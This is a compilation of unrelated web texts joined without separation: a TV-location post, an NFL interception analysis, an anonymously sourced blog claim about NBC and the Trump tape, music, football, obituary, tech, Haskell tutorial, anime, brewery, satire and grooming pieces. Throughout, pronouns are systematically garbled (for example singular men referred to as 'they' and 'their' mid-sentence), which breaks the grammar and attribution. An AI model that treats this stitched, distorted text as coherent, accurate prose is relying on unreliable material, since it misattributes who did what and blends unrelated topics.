And then it hit me like Edith Bunker hitting the high notes in “ Those Were The Days… ”
89-70 Cooper Avenue was Archie Bunker 's house , featured in the opening credits of All In The Family .
The footage was shot in the early seventies , and it 's neat to see the similarities over 40 years later . I love that the flag pole has survived . Also , note how the little tree on the left has become a much larger tree today .
Archie often identified their address as 704 Hauser Street in Astoria , but the Queens of All in the Family was clearly an amalgam of several different neighborhoods . And in a way , Cooper Ave was the perfect choice , with its lot-to-lot rows of cookie cutter housing that could pretty much be Anywhere , Queens .
Funny that the show never mentioned Archie 's view off the front stoop : a graveyard across the street !
In the later spin-off Archie Bunker 's Place , Archie opens a bar , featured in the opening credits after some neat exterior shots of 1970s Northern Blvd . But where was it ?
No one seems to know . The shot cuts away from the busy streets just before it 's pictured , so this could very well be on a soundstage in California . Then again , I 've read some claiming online that the building did exist , but was torn down .
Either way , good to know that a little bit of Archie Bunker can still be found in Queens .
-SCOUT
If you enjoyed reading this post , would you consider making a donation to help me make my first movie ? The goal is $ 50,000 , and to date , 1,728 Scouting NY readers have donated $ 36,348 ! Just $ 5 or $ 10 can make a difference - AND you get this snazzy Scouting NY sticker/magnet as a Thank-You gift ! Click here to donate today !
And hey , if you 've made it this far , why not follow us via RSS , Twitter , Facebook , Instagram , or Tumblr ?
You probably have not given much thought to Ty Law since they retired , and you almost certainly have n't given much thought to what Law did as a member of the Jets in 2005 . But it was a pretty remarkable season .
Law had 10 interceptions that year . That number may not sound like a lot to you — it 's not a record , and we rarely focus on interception totals — but no player has had more than 10 interceptions in a season since 1981 . Since Everson Walls of the Cowboys recorded 11 interceptions in 1981 , eleven players have intercepted exactly ten passes in a single season . Of those , Law played on the team that faced by far the fewest passes , and they did so in an era where it was very difficult to record interceptions . That 's why , by the metric I 'll describe below , it 's the most impressive interception season in NFL history .
First , I calculated each player 's individual interception rate , defined as their number of interceptions divided by their team 's pass attempts faced . The record here was set in 1946 by Pittsburgh 's Bill Dudley , a former first overall pick . That year , Dudley led the NFL in rushing… and punt return yards… and interceptions ! Dudley intercepted 10 passes , while the Steelers faced just 162 pass attempts , giving them an interception on 6.2 % of opponent dropbacks . Perhaps most amazing , the Steelers leading receivers each had just ten catches , which means Dudley caught as many passes on defense as any Pittsburgh player did on offense in 1946 .
Law 's 10 interceptions came against 463 opponent pass attempts , giving them an interception on 2.2 % of opposing pass plays . That remains the highest rate in a single season since Walls picked off a pass on 2.4 % of opponent pass plays in 1982 . But obviously interception rates have been sharply declining , which is what makes Law 's accomplishment so remarkable .
I calculated the league average interception rate for every league and every season since 1940 . Then , for each league season , I adjusted each player 's interception rate based on the ratio of the average interception rate since 1940 and the league average rate for that season . So , for example , players in 2014 get a multiplier of 2.15 , since interceptions are so rare now , while players in 2005 receive a multiplier of 1.76 , and players in 1978 get a multiplier of exactly 1.00 . Unfortunately for Dudley , they get a multiplier of 0.60 .
So with Dudley , their 6.2 % gets adjusted down to 3.7 % . For Law , their 2.2 % gets adjusted up to 3.8 % . And that 's how Law jumps Dudley into the top spot .
The table below shows the top 200 seasons of all time . The table is fully sortable and searchable , and you can change the number of seasons viewed by using the dropdown button on the left .
Ed Reed leads the list with five top-200 appearances . Only two linebackers — William Thomas and Thomas Howard — make the cut . And Deion makes just one appearance on the list , showing that interceptions are only a small part of defensive back play .
What do you think of this methodology ? What stands out to you ?
Billy Bush , Donald Trump and Days of our Lives actor Arianne Zucker . Zucker was apparently the subject of all the crude remarks . That bus Bush is standing next to ? He 's now under it ( source ; click to enlarge ) . Days of our Lives
NBC Planned to Use Trump Audio to Influence Debate , Election
NBC execs had a plan to time the release of the Donald Trump audio to have maximum impact on both the 2nd presidential debate and the general election ... sources connected with the network tell TMZ .
Multiple sources connected with NBC tell us ... top network execs knew about the video long before they publicly said they did , but wanted to hold it because it was too early in the election . The sources say many NBC execs have open disdain for Trump and their plan was to roll out the tape 48 hours before the debate so it would dominate the news cycle leading up to the face-off .
As we reported , Billy Bush was bragging about the tape -- in front of NBC execs at the Rio Olympics -- in early August . NBC says it 's only known about the tape for a little more than a week .
We 're told the plan was to edit the tape to keep the focus on Trump and not Billy . `` Access Hollywood '' [ , ] we 're told [ , ] was not going to air the portion where Trump and Billy got off the bus and Billy goaded Trump and the soap star to hug . Our sources say the tape was going to be `` sanitized '' to protect Billy as much as possible .
As one source put it , `` NBC really screwed Billy . They had no problem with them on the tape 'till it got leaked . '' The source goes on to say there was never a peep about disciplining Billy until the full tape got leaked .
The Billy Bush that NBC is perfectly OK with
Not long ago , Howie alluded to the timing of the release of the Mark Foley pageboy information as engineered to influence that election . Their discussion of Foley is here , in the first few paragraphs . Howie did n't exactly make a parallel to the Trump Tape release , but the implication was there , as I read it.More recently , Chris Hayes , in a side comment after one of their Trump Tape segments , also brought up the timing of the Mark Foley scandal , but without connecting the dots to the current Trump scandal . Nevertheless , they may well have been very covertly alluding to this coming revelation — that NBC in fact did engineer the timing to alter an electoral outcome . After all , MSNBC 's parent is NBC , NBC is at the heart of the story , and Hayes is in position to hear things . If thatHayes ' intention , we 'll likely never know , but I was struck by the lack of any explicit connection to the content of that segment , and the presence of this implicit connection.Now , it seems , TMZ has a source that does connect the dots between the Trump videotape release and its electoral timing . Bottom line : NBC knew about the Trump `` pussy '' tape ( the audio version ) as early as last August — learned about it , in fact , from Billy Bush themselves — and had intended to time its release for maximum influence on both the election and the Second Presidential Debate.Here 's their story The article goes on to describe how Hurricane Matthew threw off the NBC plan to release the tape , audio only , before the debate — that is , before Sunday . People at the network who wanted to see it out earlier than that , according to this report , leaked it then to the , which went with the story . After the Post story came out , Access Hollywood released their version , unsanitized audio and video , and the rest is history . ( That 's why , by the way , the Access Hollywood version looked `` wrong , '' with audio recorded onboard the bus overlaid on shots of the bus from the , arriving at its destination . Access Hollywood appears to have combined their video footage with NBC 's leaked audio footage , the audio that was recorded on the bus only . ) Clearly , if any or all of this is true , the press has laid a very heavy thumb indeed on the scales of this election . Is this a democracy yet ? I 'm having trouble figuring that out.One casualty of this affair , other than Trump , is Billy Bush , who 's recently been suspended . Of course , that makes NBC look good , suspending the co-miscreant , but , again according to the report , that was n't the plan at the start . Recall above that Bush is reportedly the one who revealed the tape 's existence to NBC execs in the first place , and the plan was to `` sanitize '' it to harm only Trump and protect Billy Bush.Did n't work out that way . Once the Post and then Access Hollywood got the story , the die was cast for Bush . They ended up under the bus they rode in on : read that correctly . NBC was fine with every slimy thing Billy Bush did and said on that tape , until it became known . Then they had to pretend they were n't , and Bush paid the price.This has all the shape of the Wells Fargo scandal writ small . In the bank 's case , thousands of employees were driven by executives to commit fraud , then fired to protect those who gave the orders to do it . Here , a daytime TV beta male sucks up to an alpha male in the unseemliest of ways , offers to let their execs use the tape of them doing it to trash the alpha male , then loses their own job when execs blow the timing of the release.Nevertheless , writ small , Bush made a far bigger splash with their downfall than any of the Wells Fargo employees did with theirs.Unseemly sells , I guess . Your national `` news '' media at work.GP
Labels : 2016 presidential race , Chris Hayes , democracy , Gaius Publius , Mark Foley , media , MSNBC , Trump , Wells Fargo
Earlier in the year , hip-hop royalty 1200 Techniques ( DJ Peril , MC N'fa and Kemstar ) , released their first music in over a decade . The Time Has Come EP landed in January via the band 's longtime label , Rubber Records .
And now , news has dropped of a special deluxe re-release of the EP available digitally and on a limited edition 7″ vinyl on October 16 . The reissue features a brand new and very special single , plus remixes , re-worked tracks and two official music videos – making it a 13-piece special package .
In comes Ghostface Killah of Wu-Tang Clan fame , and ‘ Flow Is Trouble ' is born . As first heard today on Lunch with Myf Warhurst on Double J , the iconically 1200-sounding dirty beat-filled jam , featuring guest verses from the New Yorker . You can hear ‘ Flow Is Trouble ' on your airwaves , streaming services and ITunes from tomorrow , Friday 2 October . Or take a listen and share below :
1200 Techniques – Live Dates
Saturday 24 October – The Domain , Sydney – SOULFEST 2015
Sunday 25 October – Sidney Myer Music Bowl , Melbourne – SOULFEST 2015
With Mary J. Blige , Ms/ Lauryn Hill , Miguel , Charlie Wilson , Jill Scott , Remi and more . Tickets on sale now from soulfest.com.au
Purchase || Website || Facebook
Brendan Rodgers spoke to the media on Friday afternoon ahead of Sunday 's visit of former club Swansea City to Anfield .
The Liverpool boss confirmed that defender Glen Johnson has trained this week and is back available after an ankle injury kept them sidelined for the past month .
“ Glen 's been back training and he 's felt as good as he 's done for a long time . He 'll come into the squad [ this weekend ] ” explained Rodgers .
Johnson 's return is likely to mean either themselves of Jon Flanagan replacing Aly Cissokho at left-back .
Rodgers explained how left-back Jose Enrique , who has been out since October , has been to America to seek specialist treatment on their knee injury .
“ Jose Enrique has been sent to America to get some specialist advice on their knee injury ” explained Rodgers . “ We 're looking to try and put an end to their injuries this season . ”
Centre-back Mamadou Sakho though remains sidelined , he 's been out since the Chelsea match over Christmas . “ Sakho is still probably a week or so away ” explained the boss .
On midfielder Lucas , the boss said “ Lucas Leiva is doing well but he 's not back in the squad yet . ”
Meanwhile , the boss was asked about last week 's FA Cup exit :
“ Last week we were disappointed to go out the cup . I think you see in the players reactions after the game . Our performance levels were really good . But now focusses us on what 's remaining .
“ Ideally we would have more games and be in more competitions but gives us chance to ensure players fitness levels are correct and focus on one game . ”
Asked about the Reds ' home form this season , with 11 wins from 13 games , Rodgers said :
“ It 's something we 've been building towards and need to continue our work . We just need to go in with the same approach , that same energy and commitment in games .
“ We go into every game looking to own the pitch . We have to play like we own it . That 's always been the mantra here for many many years .
“ We back ourselves now and we expect to win . Dealing with that pressure has really helped .
“ Everyone 's working tirelessly to achieve results . You do that consistently and you get momentum . ”
Finally , Rodgers was asked about Yevhen Konoplyanka , who scored against Tottenham in the Europa League last night :
“ We 've got lots of people that were looking at and we 'll assess where we at the end of the season and take it from there . ”
Liverpool face Rodgers ' form side Swansea City at Anfield on Sunday ( 1:30pm kick off ) .
Mr. Horton was known to street book vendors near Hunter College , where they struck up conversations about topics like boxing . They were known in Dobbs Ferry , N.Y. , where they spent part of their childhood in a children 's group home , after their parents abandoned him . They were known by those who befriended them aboveground and tried to help them lead a more normal existence . And they were known by law enforcement authorities ; court records show that Mr. Horton had at least 17 arrests and convictions before 2008 .
Mr. Horton was born in New York City and grew up in foster homes , according to their friend Jordan Buck , who met Mr. Horton three decades ago when they were living in Dobbs Ferry . In “ Pitch Black , ” Mr. Horton wrote that they found the streets safer than shelters . Soon they migrated to the subway 's tunnels and learned from other homeless people how to build a home there .
While Mr. Horton suffered from many of the problems their fellow tunnel dwellers faced , they also had an unusual support network . In their book , they mention substance-abuse problems , and friends say they struggled with drinking . But they also had friends like Mr. Buck , who invited them to stay with them and their sister at their apartment in TriBeCa in the mid-1990s . Mr. Horton made them omelets and often searched through the trash for gifts to give them . Still they longed for the tunnels , Mr. Buck said , and after about a year , all agreed that it was time for Mr. Horton to leave , and they returned underground .
“ He had really mixed feelings about it , ” Mr. Buck said . “ On the one hand , they set up these rooms for themselves and they definitely felt pride and a sense of ownership . There was something magical and mystical down there . The other part was lonely . ”
Mr. Horton met Ms. Landowne when they approached them on a downtown train and asked them whether they were an artist . They began talking about art , and soon they showed them their work : sketches they had done from charcoal and fax machine ink that they had rescued from trash bins . “ He drew themselves and the subways and things from their imagination , kind of better world , ” Ms. Landowne said . They talked of their love for dogs , especially their dog , Meatball , who was eventually taken from him . They said they taught gymnastics and art classes for homeless people at Jan Hus Presbyterian Church on the Upper East Side .
Photo
When Mr. Horton and Ms. Landowne decided to collaborate on a book , they showed them their tunnel homes . One dwelling had a futon , bookshelves and artwork . They said they had hidden their art and few possessions throughout the subway , since they were getting lost or stolen .
Advertisement Continue reading the main story
Last week , they sent a belated holiday card to Mr. Buck thanking them for their friendship over the years and , Mr. Buck said , “ something to the effect that I know I could n't be exactly what you all wanted me to be . ”
The type of subterranean life that Mr. Horton led “ was definitely much more prevalent in the late '80s and early '90s , ” said Patrick Markee , the senior policy analyst for the Coalition for the Homeless .
Newsletter Sign Up Continue reading the main story Please verify you 're not a robot by clicking the box . Invalid email address . Please re-enter . You must select a newsletter to subscribe to . Sign Up You will receive emails containing news content , updates and promotions from The New York Times . You may opt out at any time . You agree to receive occasional updates and special offers for The New York Times 's products and services . Thank you for subscribing . An error has occurred . Please try again later . View all New York Times newsletters .
“ We rarely run into somebody who is sleeping in the tunnels these days , ” Mr. Markee said .
Mr. Horton 's last resting place was about 150 feet north of the Queens-bound platform at 63rd Street and Lexington Avenue . After breaking a lock , firefighters discovered a two-room apartment of sorts ; Mr. Horton had turned one room into a living room , 9 by 10 feet , and another into a bedroom , 6.5 by 4.5 feet .
“ He seemed to have all of the amenities , ” said Jim Long , a Fire Department spokesperson . “ He had a couch . They had a bed . I believe there was a refrigerator-type appliance. ” The cause of the fire has not been determined .
On Monday afternoon , the scent of smoke still hung in the station . Joseph Mathew , a booth clerk at the neighboring Roosevelt Island station , said they had seen Mr. Horton a couple of times a week asking people to lend them a swipe of a MetroCard to get home . They remembered Mr. Horton the way many did on Monday , once they learned of their death .
“ He was kind , ” Mr. Mathew said . “ He was not bothering anybody . ”
The most precious commodity we have today is time . You can argue all you want , but when it 's gone , you can never get it back . ( Health is a close second when listing precious commodities ) . It seems like I blinked and already we are in the last half of March – when only a minute ago , we were counting down to the new year…for 2013 . We are bombarded at all sides with responsibilities to family and work and trying to sneak away some time to edit and build our businesses , so anything that may offer some relief and save us time is welcome .
I 've posted a few infographics for social media resizing here in the last few months , and they undoubtedly have been timesavers , but still , resizing all those images does take time and sometimes , the charts we refer to may be outdated . So , aside from hiring an intern who probably has a better handle on the changing social media sizes ( and more time to do these things ) , are there any other efficient ways to optimize your images across all the social media platforms ? There is now .
Sprout Social , a social media management software company , has just released Landscape , a free , time-saving tool to help save us precious time and headaches ( might I add ) . With Landscape , you can upload one image and with a few clicks you can customize that picture and optimize it for Twitter , Facebook , LinkedIn , Instagram , Google+ , Pinterest , YouTube and there 's also a custom option . Each social media network has a variety of options so you can choose from sizing for a profile picture , a cover photo and so forth .
After choosing the various networks , you 'll get a chance to crop the image and then press download . The files then magically appear in a folder on your desktop ( or wherever you have set your download to save ) , renamed for each network and are ready for you to post to social media . Try it out here .
No word on how often they are going to update the dimensions , but as they are also the creators of an Always-Up-to-Date Infographic , I assume that Landscape will be “ always-up-to-date ” as well .
What are you going to do with all this newfound free time ?
In February , Xiaomi had introduced its in-house chipset named as Surge S1 . It was introduced through the Xiaomi Mi 5c phone . The chipset was after more than two years of development . Fresh information that has appeared this morning states that Xiaomi is now working on its second-generation in-house chipset that is expected to arrive as Surge S2 .
The Surge S1 was manufactured by Taiwan Semiconductor Manufacturing Company ( TSMC ) . It was built with 28nm manufacturing process . With few months of launching the Surge S1 , the Chinese company has begun working on its successor . Rumors have it that the mass production of Surge S2 chips will begin soon , revealed a Taiwanese publication by citing Chinese media .
Read More : Xiaomi Mi Max 2 Review ; The Best Big Budget Smartphone of 2017 ?
Xiaomi has conducted sampling of its upcoming Surge S2 chip . TSMC will be manufacturing the new chipset and it will be built with 16nm process technology . Its mass production is expected to begin in the third quarter of this year . Since the Surge S1 powered the Xiaomi Mi 5c , speculations are rife that the upcoming Surge S2 would be present under the hood of Xiaomi Mi 6c and 6s . Both the smartphones are rumored to debut in the last quarter of 2017 .
The Xiaomi Surge S1 is an octa-core processor that feature four Cortex A53 cores running at 2.2 GHz and another four Cortex A53 cores working at 1.4 GHz . It is coupled with Mali-T860 MP4 chipset and features Cat . 4 LTE modem . It supports LPDDR3 RAM and eMMC 5.0 storage . In terms of performance , it is not on par or better than the Snapdragon 625 chipset ( built with 14nm process ) . Hence , there is a possibility that the Surge S2 could be as powerful as the Snapdragon 625 or 652 SoC . It seems that it will take some for Xiaomi to manufacture a higher-end chip that can power a flagship phone .
( source|via )
You seem to have JS switched off . While this site will work without , you will not get all of the bells and whistles implemented . So , I strongly suggest you consider turning it back on if possible - I can assure you I did not place any tracking implements or cryptominers on this page .
Prelude
I 'm very certain many of the readers play board games against computer AIs ; however , I have not noticed a large level of public awareness about the mechanics of said AIs . It is rather intriguing , since it is actually quite easy to build a simple AI opponent . These AI opponents are not very powerful though ; depending on the game , a professional will be able to hold their ground with little effort .
One marked limitation is the ineffectiveness of brute force in some games . Brute force AIs calculate all possible moves starting from a certain position to a certain depth in the game tree ( a tree describing the possible turns/changes in the game from a certain point ) , and then deciding the best course of action . The algorithm I 'm going to use is based on that ; select the best solution out of a given set . However , in some games the amount of possible different moves from a position is so high that a brute-force AI quickly becomes very inefficient : for instance , in Go the average amount of possible moves per turn is 250 ( according to researcher Victor Allis ) , which quickly leads to a very high amount of possibilities within a very few turns .
Therefore , modern AIs use more effective methods ; for example , AlphaGo , the AI that beat the Go master Lee Se-dol used neural networks which enabled it to “ learn ” from the training games presented to it , and therefore have an effective strategy markedly beyond raw calculation .
On the other hand , the game I 'm going to discuss now has the average move per turn count of just 10 . And that is ..
Haskellversi - Othello AI in Haskell - Part 1 / Definition and tools
Intro
Apologies , the picture seems to have a 10x10 grid instead of 8x8 you get
In this series of posts , I intend to build a simple , yet fully functional model of the Othello board game . This model shall also have an AI that one can play against , or put to play against itself , if that 's what one likes : D. For those unaware of the rules of the game , a short description is linked in the further reading list .
Unlike with many games , I decided to select a somewhat more unusual language , Haskell for the job . For those unaware , Haskell is a purely functional programming language markedly different from more “ common ” languages like Python and Java ; casually , this difference could be described as Haskell functions being more alike to mathematical functions . Generally , functions in mathematics can cause no side effects to their environment , and always return the same result with the same input . This is not something one should be scared of though , as the basics are fairly easy to get started with .
As of prerequisites , you will need a reasonably modern computer ( for GLOSS , an OpenGL based graphics library ) , an ability to use a command line prompt and a editor that preferably supports syntax highlighting and automatic tabulation ( Haskell , like Python , cares about the whitespace in source code ) . You will also need to be able to install your own software , and with Stack a working Internet connection is a must due to the dynamic updating .
Even though I tried to ensure that the code is reasonably simple , straightforward and well-commented , I have to remark that my experience in Haskell is n't nearly as consistent as in several other programming languages ( plus that a big part of the code was written quickly during late night ) - all comments on improvements are highly welcome . You will also likely get most out of this code-along of you know some Haskell already - although I 've tried my best to make the instructions simple enough to follow even without much knowledge : )
First things first : installing tools
Before we can get started on the programming itself , we need to install our development tools . The overwhelmingly the easiest way to do that is to use Haskell Stack .
Go to the Haskell Stack 's homepage , and follow OS-specific instructions to install as on this page . It is highly recommended not to diverge from default settings to prevent problems further down the line ; it is also highly advisable to read the Stack command manual Open your command line , and change your directory to to some empty folder Type stack new haskellversi simple - this creates a new empty , simple project . Change into this folder . Type stack setup to install the prerequisite GHC compiler and associated tools ; after that , stack build and stack exec haskellversi . If everything has gone right , you should now see hello world print on the screen . If that 's what occurs , congratulations ! You just managed to set up a Haskell development environment !
Before moving on , I highly recommend you to familiarize yourself with the elementary principles of Haskell , and the GHCi interactive interpreter , stack ghci - both will be very useful for the latter posts .
The full source is available also on GitLab
NEXT PART : Data Structures and Basic Functionality
Further reading
Love Live ! Sunshine ! ! is one of the best shows airing this season , but what makes it click so well with so many people ?
Polish and Presentation
This is a fairly straightforward one which is immediately recognisable , but I think I should elaborate a bit on what makes the fundamentals behind Sunshine so solid . To begin with , for a show about idols , it 's key to have vibrant and memorable characters .
The character designs in Love Live are not only sharp and vibrant , but they are pretty distinctive from that of other anime , making them instantly recognisable as characters from Love Live , and not just any other show ; this is super important for Sunshine to maintain , as a sequel that introduces a whole new cast of characters to an existing universe .
The malleable round faces and wide , beaming smiles are very animation-friendly , allowing for a lot of leeway for exaggerated movements and larger-than-life emotions . But these endearing , goofy faces are just one aspect of what brings the show to life…
It 's Joke
Comedy . To keep Sunshine a consistently engaging and enjoyable experience , the humour must not simply be the connective tissue to fill in downtime between key events , it has got to rise above that to also serve the desired ambitions and goals of the work . Love Live goes above and beyond in making its comedic moments land , there are a lot of aspects that go into this , from the potential for amusing character acting that I alluded to before , to the directorial execution , and timing of , the gags and punchlines .
In addition to competent delivery and visual flair , there has to be a degree of specificity to the humour that makes unique to these sets of characters in this situation , and what it says about them and the atmosphere the show is trying to create at any given moment . For example , the first episode draws a lot of humour out of Chika 's eagerness in recruiting people for their Idol club , this is expressed with their overbearing intrusion into other people 's personal space and the crooked , creepy smile they make when trying to pitch to them . This physical comedy is n't simply funny because of slapstick , but in how it both establishes ( and in subsequent instances , affirms ) what we know about Chika , she 's brash , lacks self-awareness and is prone to tunnel visioning to the point they hinder their own goals .
The other aspect of importance , is in how Love Live Sunshine ‘ s brand of humour can inform its atmosphere , and even solidify thematic statements of the story , and that 's where we come to how the story likes to evoke the emotions in the audience that it wants , through its mix of comedy and drama…
A Somewhat Lucid Reality
I 've heard people say that the feeling they get when watching Love Live is similar to that they might receive from a sitcom . I 'd specify further , that the type of anime that Love Live aims to be , is that of a Dramedy . Think of something like Glee , which is a close parallel . Instead of being focused on raucous comedy and a consistently light tone in which episode plots can safely return to a status quo , Love Live can take the best of both entertainment approaches to create an experience that is both accessible and that can lend itself towards deeper investment .
But it is n't about an unwillingness to ask more from the viewer by abandoning sincerity , it 's in order to create a rising and falling tone , a fully balanced range of emotions . Thusly , the series can remain pleasant while still demanding the viewers full empathy in the moments the story displays the characters at their most earnest , passionate and emotional moments .
Lastly , Familiarity
To round up , I think there is another key ingredient of success that Love Live has , that immeasurably strengthens the reception of all the above factors I 've talked about above . This is something that fascinates me most about the series , in how it really has struck lightning as a media property .
Here 's a little history to think about : The original cast of Love Live ! School Idol Project was revealed in 2010 , more than two years before the anime went on to air in early 2013 . Not only were there arrays of multi-media goods released between then and the airing , but reader participation and surveys were integral to shaping the identity of what we now know to be as of μ 's . So before the anime even aired , the fans already knew a lot about the characters , their appearance , their traits , their songs , and their voices * * . So much so that when watching the show it was n't like suddenly having nine characters thrust in your face , but getting to meet a bunch of friends . Well , similarly with Love Live Sunshine and Aquors , we 've known about the cast for more than a year before the show went to air , and I 'd hazard a guess that you knew most of their names before you even saw the first episode .
The lines between creator and fan have narrowed , and that 's a whole topic in and of itself , but how does this apply to you and me ? Perhaps ( or most likely as a western fan ) you were n't involved in that long vetting process ( let 's call it an open beta ) , but you watched the show a while after it came out . Even then , you 'd be somewhat familiar with the cast , the main characters from Love Live are not popular among fans , but they possess a wider recognition and shared interpretation that exists even outside viewers of the show . The characters possess a set of easily understood variables and are very easy to reinterpret , extrapolate , and make not-so-inside jokes about .
The ability for a show to have a widely accepted fan-created canon of meme mythology makes the barrier for personal investment very small , it 's so easy to imagine the characters in a variety of situations and predict how they might react , idolise their key characteristics and ultimately end up finding the characters enjoyable to watch , and likable as people in their own right . I can not overstate the impact this can have on a media property , one only needs to have a look at Overwatch to see the effect in practise .
Closing Message
All in all , I hope this post has summarised the sprawling map of thoughts I have in regard to why I find Love Live ! ! Sunshine ! an extremely rewarding ( in the immediate sense ) and fascinating ( in the intellectual sense ) show to be watching .
While this post is actually quite bite-sized in comparison to some of my more detailed analyses , it was actually a question of how best to express these thoughts in coherent chunks of thought without breaking the flow in order to provide example , clarification and backup for everything I bring up , like I might do in an episodic post ( sometimes relying instead on images to bring up a visual touchstone for an idea ) .
As such , this post required a lot of time spent in thought and experimentation before I was happy to release it . I am extremely extremely eager for feedback on it , I 'd like to know both your thoughts on my form of expression and your opinion on what I 've had to say . Thank you for reading !
Advertisements
FLEMINGTON -- Lone Eagle Brewing is taking flight . People can get a taste of what the brewery has to offer when the Thursday Night Lights series opens on July 21 . The brewery , at 44 Stangl Road across from the Polo and Timberland outlet stores , will be open from 4-10 p.m .
Its grand opening is set for Friday and Saturday , July 22-23 . The brewery will have eight beers on tap : American Pale Ale , Extra Special Bitter , West Coast IPA , Cream Ale , Hefeweizen , Porter , Double IPA and Saison .
People will be able to order beer by the flight , which is like a selection of samplers ; by the pint ; half-growler ; growler ; sixtel ( a sixth of a keg ) ; and half-keg .
See what 's on tap at Lone Eagle Brewing
It will be easy to take a tour of the brewing process ; the tanks and other machinery are at the right side of the brewery as you walk in the front doors . A second-floor loft offers a bird's-eye view .
There are tables upstairs and down where patrons can gather , crafted by students at Hunterdon County Polytech .
Lone Eagle Brewing owners Todd Becker and Bob King , both of Raritan Township , started off as home brewers in the 1990s . The timing was right for a microbrewery in Flemington , they said last fall when they introduced their plans . `` The craft beer industry is exploding in the United States , where the number of breweries nationwide recently surpassed 4,000 , '' King said . `` Hunterdon County has mostly missed out on this growth . ''
They brought in head brewer Alex Franko , who left world-renowned Dogfish Head in Milton , Del. , to join Lone Eagle .
Franko said a lack of hierarchies among the staff at Dogfish Head meant that they were able to learn all aspects of the brewing process . Now he 's embracing brewing on a smaller scale . `` Bob and Todd and I get to build it up and make it our own , '' they said in May . `` We get to pick different beer styles and see what people like . There is more creative freedom . It 's going to be a new experience . ''
Lone Eagle Brewing will be open Mondays , Wednesdays , Thursdays and Fridays 4-10 p.m. , Saturdays noon-10 p.m. , and Sundays noon-6 p.m. For more information call 908-237-2255 or visit its website , loneeaglebrewing.com .
Sallie Graziano may be reached at sgraziano @ njadvancemedia.com . Follow them on Twitter @ SallieGraziano . Find NJ.com on Facebook .
An Open Letter to People Who Take Pictures of Food With Instagram
Dear People Who Take Pictures of Food With Instagram ,
Just because the picture looks artsy does n't mean you are . I get it . We all went through our creative , experimental stages . There is a period in all of our lives where we think we can probably make money off our pseudo-artistic talent of choice . And now , you think you are a photographer because Instagram does the work for you . Do you have to focus anything ? Do you have to worry about lighting ? Do you have to think at all ? Not really . You are part of a fast growing legion of people that have been duped into believing they are visionaries , auteurs , even .
“ < 3 < 3 Gorgeous day for lunch outside < 3 < 3 , ” you post to the image of a set of railroad tracks behind a McDonald 's .
So now that you 're a professional photographer , you need to capture the simpler things in life . All of them . It is your duty as an artist , after all . And there is nothing simpler than your pretentious foodie excursions . You posted an Instagram-ed picture of a handful of blueberries the other day . What would your day have been without those blueberries ? Would you have felt a little less connected to the earth and , ultimately , yourself ? Would you have felt guilty about letting all of nature 's candy go to waste ? Or perhaps the real question is this : how disappointed would you have felt if your beautiful , plump blueberries got less than 15 likes ? It would have made blueberry picking pretty pointless , right ? But no , you are popular and people like to feel earthy and spontaneous by livng vicariously through you and your blueberry-picking adventure . So people leave comments like , “ Yummy . < 3 . Jealous ! ! ! ” And sadly the commenter is actually jealous and thinks that you are rustic and outdoorsy and simple , but in an old-timey Norman-Rockwell-America-is-really-great ! way . You were creative enough to think of this super-fun activity , one that does not involve being cooped up inside , or drinking , or giving into any of the other demands of capitalist America . This makes you better than all of us . And this also gives you permission to take pictures of what you made for dinner .
And then you did .
“ Avocado and lime marinated partridge medallions with coconut milk and ginger quinoa , slow baked paprika kale chips and hand cranked , blueberry crumble pie ice cream . YUM ! ”
That does n't even sound very good .
You proceed to take various angled shots of the avocado being sliced , the blueberries getting washed , and your bearded boyfriend plucking feathers from the partridges because the Farmer 's Market only sold them with feathers , because plucking out the feathers themselves would be too mean and they 're the nice kind of farmers who kill with love . And now that your meal looks professional and Alexandra Gaurnaschelli would approve of it ( but Scott Conant would totally get the one piece of undercooked bird ) there is a great final product shot taken , complete with two Coronas because you were feeling summery . “ Ah , the good life , ” you caption , wanting me to be simultaneously awed and intimidated by your domesticity . “ This looks awesome ! Wow ! ! You two are so cute ! ! ! ” writes jealous girl between drafts of their latest Game of Thrones fan fiction . That 's when you know you 've done it : you are officially the greatest woman on the entire planet .
What happened to everyone complaining about how much they have to do today ? Or the posting of emotionally ambiguous song lyrics ? What happened to those ? Where are all the bitches and sluts and why are n't they hanging out in the club anymore ? You used to merely use your words to let me know that YOU WERE HAVING A BAD DAY . But now all you do is flaunt how awesome you are , and expect me to leave a comment that confirms this fallacy .
I think it 's best , especially in the interest of honesty and my mounting rage , to tell you that no , no , I really , truly , absolutely , do not care about you or your food . I do n't . Sorry . Take more pictures of your cat . That might keep me interested .
By the way , your new apartment looks really cute !
Best ,
Katie
What do Dwayne ‘ The Rock ' Johnson , Jason Statham and Vin Diesel have in common ? Sure , there 's the unquestionable acting pedigree and careers that show just how good getting typecast can be ( for your wallet at least ) , but there 's another common denominator shared by action 's most wanted : they 're all bald .
They 're bald , immensely successful and regularly top ‘ sexiest men ' lists , proving you do n't need hair up top to get there . Here , we make the case for why you should embrace baldness , and how to do it in style .
Make The Most Of What You Have ( Left )
Nothing brings the cringe quite like a man clinging to their hair for dear life ( see Prince William , Billy Bob Thornton and Donald Trump ) . But that 's not to say if you notice your hair beginning to recede or thin slightly you need to throw the bald-headed baby out with the bathwater .
If you 're seeing more of your scalp than you used to , but you 're not quite Moby yet , there are steps that can be taken to conceal the beginnings of male pattern baldness .
Firstly , assess the damage with the help of a barber ; they 'll be able to survey the fallout from all angles and advise on a style that 'll visually thicken what 's left of your thatch .
If you 're receding at the temples , go for a choppy , textured cut , says Ruffians artistic director , Denis Robinson . “ This way , you can conceal the thinning at the temples by casually pushing the thicker hair over the affected areas . Avoid combing the hair back or trying to get a side parting as these styles will only accentuate thinning hair . ”
“ Alternatively , if you 've got thick hair at the front and it 's just the top that 's bald , you could grow the length and then push it back over the balding spot , ” adds Robinson . They do stress , however , that opting for this style comes with the risk that a sudden gust of wind from behind might reveal your secret . Still , it 's a smart way to buy yourself another few years before embracing the bald .
Raid The Medicine Cabinet
You might also consider enlisting the hair-boosting powers of chemistry , by using a topical vasodilator ( a fancy term for a group of medicines that open blood vessels to allow blood to flow more easily ) such as minoxidil , more commonly known as Regaine in the UK , or a prescription medication such as finasteride , both of which help prevent or even temporarily reverse pattern hair loss .
Regaine Foam For Men 3-Month Supply , available at Lloyds Pharmacy , priced £44.49 .
Be Bold , Get Buzzed
While smart styling and chemical aids can slow the rate of hair loss , there will come a time for many men when their head most closely resembles that weird egg you get in a carton that looks as if it might hatch at any moment . And that , friends , is your cue to get the chop .
“ Treatments for thinning hair only delay the process , so it 's important to come to terms with [ your baldness ] at some point , ” says Robinson .
